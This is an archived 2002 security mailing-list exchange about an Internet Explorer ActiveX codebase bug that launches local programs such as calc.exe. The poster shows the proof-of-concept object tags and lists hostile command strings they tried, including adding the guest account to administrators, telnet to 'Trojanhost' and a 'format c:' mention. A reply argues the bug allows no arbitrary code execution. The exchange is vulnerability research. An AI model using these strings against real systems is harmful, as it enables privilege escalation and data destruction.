I know we have seen many websites already showing this as a problem. <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object> <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object> Of course, this is part of the HTML that is causing this problem, but I was unable to reformat the string to cause any substantial privilege escalation in the syste, via this bug. It could well be because I do not know much about Active-X, so please do advice. I am ignorant but wanting to learn ! Here are somethings I have tried with no results (Tested on Windows XP) codebase= "strings to try below" "C:/windows/system32/net.exe send localhost Testing" "C:/windows/system32/net.exe localgroup administrators guest /add" "C:/windows/system32/iisreset.exe" "C:/windows/system32/telnet Trojanhost" "C:/windows/system32/cmd.exe /k net send localhost Testing" etc... I am not game enough to run "format c:/" of course, but anyone tell me why these strings fail miserably ? Or maybe the bug isnt exactly that easily exploitable ? Thomas Thornbury <thorntat_private> wrote: > This has got to be one of the scarier exploits in recent memory. Nah -- _far_ from it. Several people with a good record of finding truly bad holes in IE and related s/w have been banging away at this for some time now. First, to date no-one has found a way to use it for executing arbitrary code and there have been several other holes recently that do allow arbitrary code execution. Second, no-one has even found a way to poke parameters to the programs that can be launched this way, which have to have a fully specified, local to the target program filename or pre-existing CLSID definition in the target machine's registry: http://home.austin.rr.com/wiredgoddess/thepull/funRun.html I'd rate it "mildly interesting"... This does not mean MS should delay fixing it until some clever soul does work out how to achieve either or both the above, but it certainly makes it orders of magnitude less interesting and less worrying than some of the recent "auto-detach and run" Email attachments or MIME "inclusions" in web pages bugs.
This archive was generated by hypermail 2b30 : Wed Mar 06 2002 - 20:51:18 PST